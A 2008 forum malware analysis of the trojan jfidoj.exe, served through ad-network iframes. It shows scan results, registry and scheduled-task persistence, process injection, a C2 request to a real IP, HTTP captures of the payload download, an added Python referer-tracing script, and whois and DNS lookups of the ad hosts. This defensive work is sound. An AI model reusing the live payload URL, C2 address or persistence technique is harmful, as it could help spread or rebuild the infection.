jfidoj.exe (Infection by adverts ... again !!!)
Kimberly
<h4>File details</h4>
Filename: jfidoj.exe

File size: 28224 bytes
MD5: 75e22e078a270abff4febcfdfb38cd0c
SHA1: 4624a501836bb1d7be97db88d64757d5215933d2
PEiD: -
packers: UPX
QUOTE
File jfidoj.exe received on 01.29.2008 23:58:48 (CET)
AhnLab-V3 2008.1.30.10 2008.01.29 -
AntiVir 7.6.0.57 2008.01.29 TR/Crypt.ULPM.Gen
Authentium 4.93.8 2008.01.29 -
Avast 4.7.1098.0 2008.01.29 -
AVG 7.5.0.516 2008.01.29 -
BitDefender 7.2 2008.01.29 -
CAT-QuickHeal 9.00 2008.01.29 -
ClamAV 0.91.2 2008.01.29 -
DrWeb 4.44.0.09170 2008.01.29 -
eSafe 7.0.15.0 2008.01.28 suspicious Trojan/Worm
eTrust-Vet 31.3.5494 2008.01.29 -
Ewido 4.0 2008.01.29 -
FileAdvisor 1 2008.01.30 -
Fortinet 3.14.0.0 2008.01.29 -
F-Prot 4.4.2.54 2008.01.29 -
F-Secure 6.70.13260.0 2008.01.29 -
Ikarus T3.1.1.20 2008.01.29 -
Kaspersky 7.0.0.125 2008.01.29 -
McAfee 5218 2008.01.29 New Malware.bl
Microsoft 1.3109 2008.01.28 Trojan:Win32/Bohmini.A
NOD32v2 2833 2008.01.29 -
Norman 5.80.02 2008.01.29 W32/Smalltroj.CNFU
Panda 9.0.0.4 2008.01.29 Adware/NaviPromo
Prevx1 V2 2008.01.30 -
Rising 20.29.12.00 2008.01.29 -
Sophos 4.25.0 2008.01.29 Mal/HckPk-A
Sunbelt 2.2.907.0 2008.01.29 -
Symantec 10 2008.01.29 -
TheHacker 6.2.9.201 2008.01.28 -
VBA32 3.12.2.6 2008.01.29 -
VirusBuster 4.3.26:9 2008.01.29 -
Webwasher-Gateway 6.6.2 2008.01.29 Trojan.Crypt.ULPM.Gen
<h4>Technical details</h4>
Registry changes.
  • Adds the following Values.
    QUOTE
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Schedule "AtTaskMaxHours"
    Type: REG_DWORD
    Data: 48, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule "AtTaskMaxHours"
    Type: REG_DWORD
    Data: 48, 00, 00, 00
  • Deletes the following values.
    QUOTE
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Schedule "DisplayName"
    Type: REG_SZ
    Data: Task Scheduler
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule "DisplayName"
    Type: REG_SZ
    Data: Task Scheduler
  • Modifies the following values.
    QUOTE
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Schedule "NextAtJobId"
    Old type: REG_DWORD
    New type: REG_DWORD
    Old data: 01, 00, 00, 00
    New data: 19, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule "NextAtJobId"
    Old type: REG_DWORD
    New type: REG_DWORD
    Old data: 01, 00, 00, 00
    New data: 19, 00, 00, 00
Files added.
QUOTE
c:\key.shm
Date: 1/30/2008 1:07 AM
Size: 166 bytes
%Temp%\1Ll5OSVH.hdi
Date: 1/30/2008 1:07 AM
Size: 0 bytes
%System%\[RANDOM NAME].exe
Date: 1/29/2008 11:48 PM
Size: 28,224 bytes

c:\WINDOWS\Tasks\At1.job
Date: 1/30/2008 1:06 AM
Size: 350 bytes

up to

c:\WINDOWS\Tasks\At24.job
Date: 1/30/2008 1:06 AM
Size: 350 bytes
Note: %Temp% is a variable that refers to the temporary folder in the short path form. By default, this is C:\Documents and Settings\[UserName]\Local Settings\Temp\ (Windows NT/2000/XP).
%System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).


<h4>Notes</h4>
Copies itself to the %System% folder under a random name, lvmw140v.exe in our analysis. Launches lvmw140v.exe with the command-line parameter firstrun.
Tries to inject itself into most running processes (writes to their virtual memory) and creates different mutexes to mark its presence on the system.
One or more of the hooked processes connect to the internet, and browser.php is requested from 194.126.193.157.
Since 24 scheduled tasks are created, the program gets loaded every hour and every day (even after a reboot or shutdown). The tasks have been created under the SYSTEM account.
Kimberly
<h4>Tracing back the origin of the file</h4>
I was actually looking after SWF hijacks on a site that was a victim of the sponsoredads.com/images/members/1248/468x60.swf seen on youtube also, when suddenly I got a prompt from ProcessGuard about jfidoj.exe.
Where the hell did this file come from? To understand its origin, let's trace it backwards using the referer headers in the packets.
CODE
GET /ial/1201696503/e5cae51c4b588b9935f864175a694967.exe?affid=5085 HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 199.202.248.50
Connection: Keep-Alive

CODE
GET /ad/images/easy/easy2.gif HTTP/1.1
Accept: */*
Referer: http://199.202.248.50/ad/i?size=468x60&x=9&u=5085
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 199.202.248.50
Connection: Keep-Alive

CODE
GET /ad/i?size=468x60&x=9&u=5085 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.yieldmanager.com/iframe3?SwQAAFYtBAAPVgoABpkDAAIADAAAAP8AAAAEEgIABAMbNwUAVhgFAK5xBQAAAAAAAAAAAAAAAAAAAAAAAAAAAMXTK2UZ4qg.xdMrZRniqD8k2.l-arzEPyTb-X5qvMQ.SOF6FK5H0T9I4XoUrkfRPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACty6Mq6L6QP8CZaq9mbATD33b.e5Oqwl7DEFdwAAAAA=,,http://ad2.adecn.com/here.spot?v=2.2;time=317;spotid=7647;c=0;ms=1201710817092
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 199.202.248.50
Connection: Keep-Alive

199.202.248.50 does host a few rotating advertising banners - GIF format - and we also see an iframe present here. It's the code / script responsible for installing jfidoj.exe on our PC.

Full trace of the TCP/IP stream.

CODE
GET /iframe3?SwQAAFYtBAAPVgoABpkDAAIADAAAAP8AAAAEEgIABAMbNwUAVhgFAK5xBQAAAAAAAAAAAAAAAAAAAAAAAAAAAMXTK2UZ4qg.xdMrZRniqD8k2.l-arzEPyTb-X5qvMQ.SOF6FK5H0T9I4XoUrkfRPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACty6Mq6L6QP8CZaq9mbATD33b.e5Oqwl7DEFdwAAAAA=,,http://ad2.adecn.com/here.spot?v=2.2;time=317;spotid=7647;c=0;ms=1201710817092 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad.media-servers.net/st?ad_type=iframe&ad_size=468x60&section=273750
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Cookie: uid=uid=7fefd83c-cf50-11dc-a6c3-001cc4a56bf9&_hmacv=1&_salt=2356122850&_keyid=k1&_hmac=af949060bbe2bf4d25521dbb343885442ded8a6f; liday1=gl%Aq[FcYkN1NBHUol3T; vuday1==-B7xoEKxaN1NBH!4Bc'; ih="b!!!!(!!Vyx!!!!#:#gf4!![JR!!!!#:#gb8!!k3a!!!!$:#geO!#'Xm!!!!#:#gb_!#(B.!!!!$:#gf3"; pv1="b!!!!#!!$P8!!$t[!!=-d!!Vyx!!7Ai!!mT-!?5%!(h139![(N+!!QW]!!D:>~~~~~~:#gf4~#rkkV"; fl_inst=1
Connection: Keep-Alive
Host: ad.yieldmanager.com

Iframe on ad.yieldmanager.com
CODE
GET /st?ad_type=iframe&ad_size=468x60&section=273750 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://ad2.adecn.com/here.spot?v=2.2;time=317;spotId=7647;c=0;ms=1201710817092
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ad.media-servers.net
Connection: Keep-Alive

CODE
GET /here.spot?v=2.2;time=317;spotId=7647;c=0;ms=1201710817092 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.axill.com/cpm/Cpm.aspx?affid=31637&W=468
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ad2.adecn.com
Connection: Keep-Alive
Cookie: EC=e268ed02af6acee0adb20a728fe266c6

Iframe on ad2.adecn.com
axill.com serves rotating ads, just like everybody else. In the capture below you can clearly see the code used to call a script located on cds.adecn.com. I left out the referer on purpose since it does identify the site owner.
Web site owners live from adverts, users are victims of adverts, advertising companies just care about the $...
We all advise to be careful:
  • with email attachments.
  • about p2p programs.
  • about visiting crack and p0rn sites.
  • etc ...
Seeing the recent developments, we will have to add Flash and adverts to our best practices advice speech very soon...
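The referer walk above, as an added example (not the poster's code): it parses captured requests, follows each Referer to the request that produced it, and handles the two snags the captures show: the .exe GET carries no Referer at all (so it pivots on a sibling request to the same host, as the post does), and the axill.com request that starts the chain is not in the capture. Hosts, paths and parameters are taken from the post; the yieldmanager iframe token and the cookies are replaced by placeholders.

```python
"""Follow Referer headers backwards through captured HTTP requests to find where a
download came from. CAPTURE is constructed from the requests shown in the post:
hosts and paths are kept, the long yieldmanager iframe3 blob is the placeholder
TOKEN and cookies are dropped."""
from urllib.parse import urlsplit

UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
TOKEN = "TOKEN"  # placeholder for the opaque iframe3 parameter blob
ADECN = "http://ad2.adecn.com/here.spot?v=2.2;time=317;spotid=7647;c=0;ms=1201710817092"

CAPTURE = [
    # 1. the payload download itself carries no Referer header
    "GET /ial/1201696503/e5cae51c4b588b9935f864175a694967.exe?affid=5085 HTTP/1.1\r\n"
    f"Accept: */*\r\nUser-Agent: {UA}\r\nHost: 199.202.248.50\r\n",
    # 2. a banner image fetched by the same iframe page on the payload host
    "GET /ad/images/easy/easy2.gif HTTP/1.1\r\nAccept: */*\r\n"
    "Referer: http://199.202.248.50/ad/i?size=468x60&x=9&u=5085\r\n"
    f"User-Agent: {UA}\r\nHost: 199.202.248.50\r\n",
    # 3. the iframe page on the payload host, pulled in by the yieldmanager iframe
    "GET /ad/i?size=468x60&x=9&u=5085 HTTP/1.1\r\n"
    f"Referer: http://ad.yieldmanager.com/iframe3?{TOKEN},,{ADECN}\r\n"
    "Host: 199.202.248.50\r\n",
    # 4. yieldmanager iframe, referred by media-servers.net
    f"GET /iframe3?{TOKEN},,{ADECN} HTTP/1.1\r\n"
    "Referer: http://ad.media-servers.net/st?ad_type=iframe&ad_size=468x60&section=273750\r\n"
    "Host: ad.yieldmanager.com\r\n",
    # 5. media-servers.net, referred by adecn
    "GET /st?ad_type=iframe&ad_size=468x60&section=273750 HTTP/1.1\r\n"
    "Referer: http://ad2.adecn.com/here.spot?v=2.2;time=317;spotId=7647;c=0;ms=1201710817092\r\n"
    "Host: ad.media-servers.net\r\n",
    # 6. adecn, referred by the axill.com rotator (the axill request itself is not captured)
    "GET /here.spot?v=2.2;time=317;spotId=7647;c=0;ms=1201710817092 HTTP/1.1\r\n"
    "Referer: http://www.axill.com/cpm/Cpm.aspx?affid=31637&W=468\r\nHost: ad2.adecn.com\r\n",
]


def parse_request(raw):
    """Parse one raw HTTP/1.x request; header names are lower-cased for lookup."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # end of headers
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "url": f"http://{headers.get('host', '')}{target}", "headers": headers}


def _key(url, fold_case=False):
    """Matching key: scheme and host are case-insensitive; optionally fold path/query too
    (the captures mix spotid/spotId in otherwise identical URLs)."""
    p = urlsplit(url)
    key = f"{p.scheme.lower()}://{p.netloc.lower()}{p.path}" + (f"?{p.query}" if p.query else "")
    return key.lower() if fold_case else key


def trace_chain(requests, start_url):
    """Walk backwards from start_url; returns hops from the payload to the earliest URL known.
    via: 'referer' (the request's own Referer), 'sibling-on-same-host' (the request had no
    Referer, so the Referer of another request to the same host that points at a page on
    that host was used), 'not-captured' (Referer names a URL with no request in the capture)."""
    exact = {_key(r["url"]): r for r in requests}
    folded = {_key(r["url"], True): r for r in requests}
    chain, seen = [], set()
    current = exact.get(_key(start_url))
    while current is not None and current["url"] not in seen:
        seen.add(current["url"])
        referer, via = current["headers"].get("referer"), "referer"
        if referer is None:
            host = urlsplit(current["url"]).netloc
            for sib in requests:
                ref = sib["headers"].get("referer")
                if sib is not current and ref and urlsplit(sib["url"]).netloc == host \
                        and urlsplit(ref).netloc == host:
                    referer, via = ref, "sibling-on-same-host"
                    break
        chain.append({"url": current["url"], "via": via})
        if referer is None:
            break
        current = exact.get(_key(referer)) or folded.get(_key(referer, True))
        if current is None:
            chain.append({"url": referer, "via": "not-captured"})
    return chain


def hosts(chain):
    """Hostnames along the chain, payload host first."""
    return [urlsplit(hop["url"]).netloc for hop in chain]


if __name__ == "__main__":
    reqs = [parse_request(r) for r in CAPTURE]
    for hop in trace_chain(reqs, reqs[0]["url"]):
        print(f"{hop['via']:22} {hop['url']}")
```

Read from the bottom up, the output is the path in the post: axill.com rotator, ad2.adecn.com, ad.media-servers.net, ad.yieldmanager.com iframe, then the banner host that served the .exe.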
Kimberly
<h4>The "Actors"</h4>
199.202.248.50

QUOTE
Queried whois.arin.net with "199.202.248.50"...

OrgName: Metrix Interlink Inc.
OrgID: ILI
Address: 630 Boul. Rene-Levesque Ouest
Address: Suite 2300
City: Montreal
StateProv: QC
PostalCode: H3B-1S6
Country: CA

NetRange: 199.202.234.0 - 199.202.255.255
CIDR: 199.202.234.0/23, 199.202.236.0/22, 199.202.240.0/20
NetName: INTERLINK-NETS
NetHandle: NET-199-202-234-0-1
Parent: NET-199-0-0-0-0
NetType: Direct Allocation
NameServer: NS.UUNET.CA
NameServer: NS2.UUNET.CA
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABL
RegDate: 1994-06-14
Updated: 2006-10-12

RTechHandle: AM43-ARIN
RTechName: Matoga, Andrew
RTechPhone: +1-514-875-0010
RTechEmail: admin@interlink.net

OrgAbuseHandle: ABUSE3-ARIN
OrgAbuseName: abuse
OrgAbusePhone: +1-800-900-0241
OrgAbuseEmail: abuse-mail@verizonbusiness.com

OrgNOCHandle: OA12-ARIN
OrgNOCName: UUnet Technologies, Inc., Technologies
OrgNOCPhone: +1-800-900-0241
OrgNOCEmail: help4u@verizonbusiness.com

OrgTechHandle: SWIPP-ARIN
OrgTechName: swipper
OrgTechPhone: +1-800-900-0241
OrgTechEmail: swipper@verizonbusiness.com

# ARIN WHOIS database, last updated 2008-01-29 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

DNS records
DNS query for 50.248.202.199.in-addr.arpa returned an error from the server: NameError

No records to display

Service scan
FTP - 21 220 (vsFTPd 2.0.5)
500 OOPS: vsf_sysutil_recv_peek: no data
500 OOPS: child died

SMTP - 25 Error: ConnectionRefused
HTTP - 80 HTTP/1.1 200 OK
Date: Wed, 30 Jan 2008 17:13:17 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0
Last-Modified: Tue, 18 Dec 2007 19:51:59 GMT
ETag: "1a84e8-1-dc9bb5c0"
Accept-Ranges: bytes
Content-Length: 1
Connection: close
Content-Type: text/html
POP3 - 110 Error: ConnectionRefused
IMAP - 143 Error: ConnectionRefused

QUOTE
Looking up nameservers in charge for 199.202.248.50...

e.root-servers.net told us to ask A.ROOT-SERVERS.NET. NSTLD.VERISIGN-GRS.COM. 2008013000 1800 900 604800 86400
NS-Record(s) for 199.202.248.50 at parent-server A.ROOT-SERVERS.NET. NSTLD.VERISIGN-GRS.COM. 2008013000 1800 900 604800 86400:
L.GTLD-SERVERS.NET. 192.41.162.30
M.GTLD-SERVERS.NET. 192.55.83.30
A.GTLD-SERVERS.NET. 192.5.6.30
B.GTLD-SERVERS.NET. 192.33.14.30
C.GTLD-SERVERS.NET. 192.26.92.30
D.GTLD-SERVERS.NET. 192.31.80.30
E.GTLD-SERVERS.NET. 192.12.94.30
F.GTLD-SERVERS.NET. 192.35.51.30
G.GTLD-SERVERS.NET. 192.42.93.30
H.GTLD-SERVERS.NET. 192.54.112.30
I.GTLD-SERVERS.NET. 192.43.172.30
J.GTLD-SERVERS.NET. 192.48.79.30
K.GTLD-SERVERS.NET. 192.52.178.30

Error looking up NS-Records for 199.202.248.50 !

MX-Servers for 199.202.248.50:

SOA-Record for 199.202.248.50:

Serial:
Refresh:
Retry:
Expire: (0 hours or 0 days)
TTL:

SPF/TXT-Records for 199.202.248.50:
No TXT-Records for 199.202.248.50!
No SPF-Records for 199.202.248.50!

NS-Versioninfo:
Error looking up NS-Records for 199.202.248.50 !

Recursive-Queries:
Error looking up NS-Records for 199.202.248.50 !

NS-AXFR:
Error looking up NS-Records for 199.202.248.50 !

QUOTE
System / Port: 199.202.248.50 : 80
IP: 199.202.248.50
System uptime: System uptime seems: 12 days, 23 hours, 27 minutes, 34 seconds
Initial TTL-Value (TCP): 64
Initial TTL-Value (ICMP): 64
TTL of returning TCP-packets: 52 (12 TCP- Hops between ServerSniff and the target 199.202.248.50)
TTL of returning ICMP-packets: 52 (12 ICMP- Hops between ServerSniff and the target 199.202.248.50)
TCP-window-size: 5792
Gathered tcp-timestamps: 1121248476
1121249455
1121250468
1121251498
1121252515
1121253520
1121254529

Gathered tcp-sequence-numbers: 300824546 (300824546)
292250785 (8573761)
294346247 (2095462)
295513575 (1167328)
308615082 (13101507)
296364599 (12250483)
308951725 (12587126)

TCP RoundTripTimes: 147.1 ms, 144.5 ms, 155.2 ms, 164.9 ms, 167.3 ms, 178.6 ms, 207.1 ms
Average time for TCP-packets:
<>(TCP, Port 80, [rtt]): 166.39 ms <> (min: 144.5, max: 207.1)
We consider this a bit slow
Average time for ICMP-packets:
<>ICMP-Echo, [rtt]): 157.6 ms <> (min: 123.9, max: 200.7)
We consider this a bit slow
Gathered IP-ids (tcp): The system doesn't return any TCP IP-IDs.
Gathered IP-ids (ICMP): 48966
48967
48968
48969
48970
48971
48972

Don't-fragment-bit (df) set: yes
Sending packet to port 1: System answers on port 1 with RST
Sending packet with wrong CRC to port 1: System answers on to BAD-Packets on port 1.
Firewall?
References:

http://www.robtex.com/ip/199.202.248.50.html
http://www.robtex.com/route/199.202.248.0-24.html
http://serversniff.net/asreport-817.html
______________________________

ad.yieldmanager.com

QUOTE
Address lookup
canonical name ad.yieldmanager.com.
aliases
addresses 76.13.212.11

Domain Whois record
Queried whois.internic.net with "dom yieldmanager.com"...

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: YIELDMANAGER.COM
Registrar: MARKMONITOR INC.
Whois Server: whois.markmonitor.com
Referral URL: http://www.markmonitor.com
Name Server: PDNS3.ULTRADNS.ORG
Name Server: PDNS4.ULTRADNS.ORG
Name Server: PDNS1.ULTRADNS.NET
Name Server: PDNS2.ULTRADNS.NET
Name Server: PDNS5.ULTRADNS.INFO
Name Server: PDNS6.ULTRADNS.CO.UK
Status: clientTransferProhibited
Status: clientUpdateProhibited
Status: clientDeleteProhibited
Updated Date: 19-jul-2007
Creation Date: 08-aug-2001
Expiration Date: 08-aug-2009

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

Queried whois.markmonitor.com with "yieldmanager.com"...

MarkMonitor.com - The Leader in Corporate Domain Management
----------------------------------------------------------
For Global Domain Consolidation, Research & Intelligence,
and Enterprise DNS, go to: www.markmonitor.com
----------------------------------------------------------

The Data in MarkMonitor.com's WHOIS database is provided by MarkMonitor.com
for information purposes, and to assist persons in obtaining information
about or related to a domain name registration record. MarkMonitor.com
does not guarantee its accuracy. By submitting a WHOIS query, you agree
that you will use this Data only for lawful purposes and that, under no
circumstances will you use this Data to: (1) allow, enable, or otherwise
support the transmission of mass unsolicited, commercial advertising or
solicitations via e-mail (spam); or (2) enable high volume, automated,
electronic processes that apply to MarkMonitor.com (or its systems).
MarkMonitor.com reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by this policy.
Registrant:
Yahoo! Inc.
(DOM-1506094)
701 First Avenue
Sunnyvale
CA
94089
US

Domain Name: yieldmanager.com

Registrar Name: Markmonitor.com
Registrar Whois: whois.markmonitor.com
Registrar Homepage: http://www.markmonitor.com

Administrative Contact:
Domain Administrator
(NIC-1457976)
Yahoo! Inc.
701 First Avenue
Sunnyvale
CA
94089
US
domainadmin@yahoo-inc.com
+1.4083493300
Fax- +1.4083493301
Technical Contact, Zone Contact:
Domain Administrator
(NIC-1457976)
Yahoo! Inc.
701 First Avenue
Sunnyvale
CA
94089
US
domainadmin@yahoo-inc.com
+1.4083493300
Fax- +1.4083493301

Created on..............: 2001-Aug-08.
Expires on..............: 2009-Aug-08.
Record last updated on..: 2007-Sep-18 09:45:58.

Domain servers in listed order:

PDNS1.ULTRADNS.NET
PDNS5.ULTRADNS.INFO
PDNS2.ULTRADNS.NET
PDNS6.ULTRADNS.CO.UK
PDNS3.ULTRADNS.ORG
PDNS4.ULTRADNS.ORG

MarkMonitor.com - The Leader in Corporate Domain Management
----------------------------------------------------------
For Global Domain Consolidation, Research & Intelligence,
and Enterprise DNS, go to: www.markmonitor.com
----------------------------------------------------------

Network Whois record
Queried whois.arin.net with "76.13.212.11"...

OrgName: Yahoo
OrgID: YHOO
Address: 701 First Ave
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US

NetRange: 76.13.0.0 - 76.13.255.255
CIDR: 76.13.0.0/16
NetName: A-YAHOO-US7
NetHandle: NET-76-13-0-0-1
Parent: NET-76-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.YAHOO.COM
NameServer: NS2.YAHOO.COM
NameServer: NS3.YAHOO.COM
NameServer: NS4.YAHOO.COM
NameServer: NS5.YAHOO.COM
Comment:
RegDate: 2007-05-02
Updated: 2007-09-13

RAbuseHandle: NETWO857-ARIN
RAbuseName: Network Abuse
RAbusePhone: +1-408-349-3300
RAbuseEmail: network-abuse@cc.yahoo-inc.com

RTechHandle: NA258-ARIN
RTechName: Netblock Admin
RTechPhone: +1-408-349-3300
RTechEmail: jluster@yahoo-inc.com

OrgAbuseHandle: NETWO857-ARIN
OrgAbuseName: Network Abuse
OrgAbusePhone: +1-408-349-3300
OrgAbuseEmail: network-abuse@cc.yahoo-inc.com

OrgTechHandle: NA258-ARIN
OrgTechName: Netblock Admin
OrgTechPhone: +1-408-349-3300
OrgTechEmail: jluster@yahoo-inc.com

# ARIN WHOIS database, last updated 2008-01-29 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

DNS records
name class type data time to live
ad.yieldmanager.com IN A 76.13.208.11 300s (00:05:00)
yieldmanager.com IN TXT v=spf1 mx a:mail.sj.yieldmanager.com mx:mail.se.yieldmanager.com ip4:208.67.64.0/21 ip4:72.37.156.25/32 include:rightmedia.com ~all 600s (00:10:00)
yieldmanager.com IN SOA server: pdns1.ultradns.net
email: dns.rightmedia.com
serial: 2008012803
refresh: 1200
retry: 120
expire: 1209600
minimum ttl: 3600
1800s (00:30:00)
yieldmanager.com IN A 208.67.66.24 3600s (01:00:00)
yieldmanager.com IN NS pdns6.ultradns.co.uk 86400s (1.00:00:00)
yieldmanager.com IN NS pdns5.ultradns.info 86400s (1.00:00:00)
yieldmanager.com IN NS pdns4.ultradns.org 86400s (1.00:00:00)
yieldmanager.com IN NS pdns3.ultradns.org 86400s (1.00:00:00)
yieldmanager.com IN NS pdns2.ultradns.net 86400s (1.00:00:00)
yieldmanager.com IN NS pdns1.ultradns.net 86400s (1.00:00:00)
yieldmanager.com IN MX preference: 10
exchange: mail.se.yieldmanager.com
600s (00:10:00)
11.212.13.76.in-addr.arpa IN PTR ad1.p3.vip.rm.sp1.yahoo.com 932s (00:15:32)
______________________________

ad.media-servers.net

QUOTE
Address lookup
canonical name ad.yieldmanager.com.
aliases ad.media-servers.net

addresses 76.13.212.11

Domain Whois record
Queried whois.internic.net with "dom media-servers.net"...

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: MEDIA-SERVERS.NET
Registrar: GODADDY.COM, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.EVERYDNS.NET
Name Server: NS2.EVERYDNS.NET
Name Server: NS3.EVERYDNS.NET
Name Server: NS4.EVERYDNS.NET
Status: clientRenewProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Status: clientDeleteProhibited
Updated Date: 10-dec-2006
Creation Date: 19-sep-2004
Expiration Date: 19-sep-2008

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

Queried whois.godaddy.com with "media-servers.net"...

The data contained in GoDaddy.com, Inc.'s WhoIs database,
while believed by the company to be reliable, is provided "as is"
with no guarantee or warranties regarding its accuracy. This
information is provided for the sole purpose of assisting you
in obtaining information about domain name registration records.
Any use of this data for any other purpose is expressly forbidden without the prior written
permission of GoDaddy.com, Inc. By submitting an inquiry,
you agree to these terms of usage and limitations of warranty. In particular,
you agree not to use this data to allow, enable, or otherwise make possible,
dissemination or collection of this data, in part or in its entirety, for any
purpose, such as the transmission of unsolicited advertising and
and solicitations of any kind, including spam. You further agree
not to use this data to enable high volume, automated or robotic electronic
processes designed to collect or compile this data for any purpose,
including mining this data for your own personal or commercial purposes.

Please note: the registrant of the domain name is specified
in the "registrant" field. In most cases, GoDaddy.com, Inc.
is not the registrant of domain names listed in this database.

Registrant:
Domains by Proxy, Inc.

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: MEDIA-SERVERS.NET

Domain servers in listed order:
NS1.EVERYDNS.NET
NS2.EVERYDNS.NET
NS3.EVERYDNS.NET
NS4.EVERYDNS.NET


For complete domain details go to:
http://who.godaddy.com/whoischeck.aspx?Dom...DIA-SERVERS.NET

Network Whois record
Queried whois.arin.net with "76.13.212.11"...

OrgName: Yahoo
OrgID: YHOO
Address: 701 First Ave
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US

NetRange: 76.13.0.0 - 76.13.255.255
CIDR: 76.13.0.0/16
NetName: A-YAHOO-US7
NetHandle: NET-76-13-0-0-1
Parent: NET-76-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.YAHOO.COM
NameServer: NS2.YAHOO.COM
NameServer: NS3.YAHOO.COM
NameServer: NS4.YAHOO.COM
NameServer: NS5.YAHOO.COM
Comment:
RegDate: 2007-05-02
Updated: 2007-09-13

RAbuseHandle: NETWO857-ARIN
RAbuseName: Network Abuse
RAbusePhone: +1-408-349-3300
RAbuseEmail: network-abuse@cc.yahoo-inc.com

RTechHandle: NA258-ARIN
RTechName: Netblock Admin
RTechPhone: +1-408-349-3300
RTechEmail: jluster@yahoo-inc.com

OrgAbuseHandle: NETWO857-ARIN
OrgAbuseName: Network Abuse
OrgAbusePhone: +1-408-349-3300
OrgAbuseEmail: network-abuse@cc.yahoo-inc.com

OrgTechHandle: NA258-ARIN
OrgTechName: Netblock Admin
OrgTechPhone: +1-408-349-3300
OrgTechEmail: jluster@yahoo-inc.com

# ARIN WHOIS database, last updated 2008-01-29 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

DNS records
name class type data time to live
ad.media-servers.net IN CNAME ad.yieldmanager.com 2104s (00:35:04)
ad.yieldmanager.com IN A 76.13.212.11 300s (00:05:00)
media-servers.net IN SOA server: ns1.everydns.net
email: hostmaster.media-servers.net
serial: 1201720007
refresh: 3600
retry: 900
expire: 1209600
minimum ttl: 3600
360s (00:06:00)
media-servers.net IN NS ns1.everydns.net 86400s (1.00:00:00)
media-servers.net IN NS ns2.everydns.net 86400s (1.00:00:00)
media-servers.net IN NS ns3.everydns.net 86400s (1.00:00:00)
media-servers.net IN NS ns4.everydns.net 86400s (1.00:00:00)
media-servers.net IN A 65.254.32.138 86400s (1.00:00:00)
11.212.13.76.in-addr.arpa IN PTR ad1.p3.vip.rm.sp1.yahoo.com 807s (00:13:27)
______________________________

ad2.adecn.com

QUOTE
Address lookup
canonical name ad2.adecn.com.
aliases
addresses 209.10.222.100

Domain Whois record
Queried whois.internic.net with "dom adecn.com"...

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: ADECN.COM
Registrar: TUCOWS INC.
Whois Server: whois.tucows.com
Referral URL: http://domainhelp.opensrs.net
Name Server: NS3.MSFT.NET
Name Server: NS1.MSFT.NET
Name Server: NS5.MSFT.NET
Name Server: NS2.MSFT.NET
Name Server: NS4.MSFT.NET
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 12-dec-2007
Creation Date: 29-nov-1999
Expiration Date: 29-nov-2010

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

Queried whois.tucows.com with "adecn.com"...

Registrant:
Microsoft Corporation
1 Microsoft Way
